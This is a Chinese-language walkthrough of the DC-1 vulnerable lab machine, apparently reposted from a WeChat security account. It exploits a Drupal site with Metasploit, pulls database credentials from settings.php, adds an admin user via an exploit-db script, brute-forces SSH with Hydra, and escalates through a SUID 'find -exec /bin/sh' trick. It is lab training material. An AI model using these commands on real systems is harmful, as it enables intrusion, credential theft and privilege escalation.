打开靶场,登录账号密码:
roottoor
然后我们查看ifconfig,访问IP地址可以直接进入靶场
首先进入这个靶场中,我们先了解了这个靶场的cms,是Drupal
首先尝试第一种方式:
我们使用kali中的msf框架进行一个漏洞利用
搜索drupal可利用的漏洞模块
search drupal
我们可以选择一种攻击模块进行尝试。
我这里随便选择了一个,我们查看该模块的配置信息
主要配置信息是rhosts,我们设置一下目标地址
我们直接开始攻击
进去之后可以利用shell,查看当前目录下的内容,找到flag1.txt
提示:
目标cms的关键有一个配置文件目录
/var/www/sites/default/settings.php
我们上面拿到了shell,所以我们这里就可以直接通过shell来查看这个配置文件中的内容
flag2就是这个配置文件,从这个配置文件中我们获取了数据库登录的账号和密码
账号:dbuser
密码:R0ck3t
下面我们需要登录数据库,先优化一下界面,使用python的pty
python -c 'import pty;pty.spawn("/bin/bash")'
连接进数据库中
mysql -udbuser -pR0ck3t我们进行常规查询命令
show databases;use drupaldb;show tables;
查看users表
select * from users;
有两种方法:
第一种利用密码重置建立一个账户
该cms自带的,忘记密码时执行的语句
php scripts/password-hash.sh 【自定密码】
第二种利用漏洞建立一个用户
我们搜索kali中自带的一些漏洞利用脚本
searchploit drupal
找到下面这个脚本
然后我们记下这个脚本的位置,开始使用
python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.0.103 -u bai -p 123456
后面是目标地址,用户名和用户密码
然后使用新添加的账号就可以登录了。
下一步,我们查看一下服务器中的passwd文件,发现有一个flag4用户,但是shadow文件无法查看,所以我们尝试使用hydra破解 一下密码,使用kali内置的字典。
hydra -l flag4 -P /usr/share/wordlists/rockyou.txt 192.168.0.103 ssh
这里我们使用ssh,也就是爆破22端口
这里爆破出密码,我们就可以使用这个账户来远程登录了
ssh flag4@192.168.0.103
我们现在已经成功登录上去了
这里我们就找到flag4
我们到root根目录下,找到了最后一个flag
这里我们需要提权到root权限
我们查看一下可以使用哪些命令来执行root权限
find / -perm -u=s -type f 2>/dev/null
这里我们可以找到这些命令用来提权
我们要利用find命令提权的话,就需要当前目录下搜索一个文件,当前目录下要是没有可以touch创建一个,当前目录下有一个flag4.txt
我们输入
find / -name flag4.txt -exec "/bin/sh" ;
这里我们就成功提权,可以查看最后一个flag
获取靶场文件:
链接:https://pan.baidu.com/s/1bVA0fE8FIJV2kEoxiAd47w
提取码:jmlr
扫描二维码关注我们吧!
原文始发于微信公众号(白安全组):DC 1的实战操作思路(文章末尾靶场下载链接)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论